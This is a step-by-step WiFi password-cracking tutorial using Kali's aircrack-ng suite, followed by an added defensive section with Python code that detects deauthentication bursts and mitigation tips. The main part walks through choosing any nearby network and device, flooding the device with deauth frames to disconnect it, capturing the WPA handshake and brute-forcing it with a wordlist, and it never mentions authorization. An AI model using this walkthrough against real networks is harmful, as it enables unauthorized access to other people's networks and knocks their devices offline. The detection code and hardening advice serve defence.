Prerequisites: You must have a USB wireless network card
Connect the USB wireless network card to the virtual machine as a removable device, then open a terminal to view the current wireless network card
root@kali: ~# airmon-ng
NIC name: wlan0mon
Enable the card (this puts it into monitor mode)
root@kali: ~# airmon-ng start wlan0mon
Detect nearby WiFi
root@kali: ~# airodump-ng wlan0mon
For the test, note that the smaller the absolute value of PWR, the stronger the WiFi signal. Press ctrl+z to terminate the search.
Record the BSSID and CH of the target WiFi
Listen to the router
root@kali:~# airodump-ng -w woshoubao -c X --bssid XX:XX:XX:XX:XX:XX wlan0mon --ignore-negative-one
The value after -w is the file name for the handshake capture (you can choose it yourself), the value after -c is the CH (channel), and the value after --bssid is the BSSID recorded in the previous step
The output lists the MAC addresses of the devices connected to the WiFi; pick any one line as the attack target. Here we take the first one as an example and record its STATION. Open a new terminal and do not close this one.
Intercept the handshake packet
root@kali:~# aireplay-ng --deauth 20 -a **:**:**:**:**:** -c **:**:**:**:**:** wlan0mon --ignore-negative-one
The 20 after --deauth represents 20 attacks, -a is the router's MAC address (that is, the recorded BSSID), and -c is the MAC address of the device being attacked (that is, the STATION recorded in the previous step). This sends a large amount of data at the device so that it disconnects from the WiFi; when the device reconnects, the handshake packet is intercepted
After a few seconds of attacking, the following interface will appear
This is the handshake we intercepted
A woshoubao-01.cap file will appear in the home directory; this is the intercepted handshake packet.
Then a dictionary of passwords is required, and success depends on whether the password is included in the dictionary.
The speed of cracking depends on the complexity of the password and the size of the dictionary
Crack
aircrack-ng -w /tmp/123.txt woshoubao-01.cap
/tmp/123.txt is the path to the dictionary; the command then starts to brute-force the handshake packet
The password is simple and can be cracked quickly:
The password is complex, and I don't know when it can be cracked:
Why don't you go home and change your password?
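
Seen from the network owner's side, the deauthentication step above is noisy and can be detected. The following is an added example, not part of the original page: it flags a burst of deauth frames aimed at one station and records whether a handshake followed. The frame records, their field layout, the thresholds and the function name are assumptions; a real sensor would fill them from a monitor-mode capture.

```python
from collections import defaultdict, deque

# Constructed sample: (seconds, frame subtype, BSSID, station) as a monitor-mode
# sensor might log management frames. All addresses are made up.
SAMPLE_FRAMES = (
    [(0.0, "beacon", "AA:BB:CC:00:00:01", "FF:FF:FF:FF:FF:FF"),
     (1.2, "deauth", "AA:BB:CC:00:00:01", "11:22:33:00:00:02")]  # lone, normal
    + [(10.0 + i * 0.05, "deauth", "AA:BB:CC:00:00:01", "11:22:33:00:00:01")
       for i in range(20)]                                       # burst of 20
    + [(11.5, "eapol", "AA:BB:CC:00:00:01", "11:22:33:00:00:01")]  # re-handshake
)


def detect_deauth_bursts(frames, threshold=10, window=2.0, follow=5.0):
    """Return alerts for (bssid, station) pairs that receive >= threshold
    deauth frames within `window` seconds. Each alert also records whether an
    EAPOL handshake for the same pair followed within `follow` seconds, which
    is the moment a capture like the one above would succeed."""
    recent = defaultdict(deque)   # pair -> timestamps of recent deauth frames
    alerts = {}                   # pair -> alert dict (one per pair)
    for ts, subtype, bssid, station in sorted(frames):
        pair = (bssid, station)
        if subtype == "deauth":
            q = recent[pair]
            q.append(ts)
            while q and ts - q[0] > window:   # drop frames outside the window
                q.popleft()
            if len(q) >= threshold and pair not in alerts:
                alerts[pair] = {"bssid": bssid, "station": station,
                                "burst_at": ts, "handshake_followed": False}
        elif subtype == "eapol" and pair in alerts:
            if ts - alerts[pair]["burst_at"] <= follow:
                alerts[pair]["handshake_followed"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_deauth_bursts(SAMPLE_FRAMES):
        print(alert)
```

Enabling Protected Management Frames (802.11w) on the router makes spoofed deauthentication frames ineffective against clients that support it, and a long passphrase that appears in no dictionary defeats the cracking step.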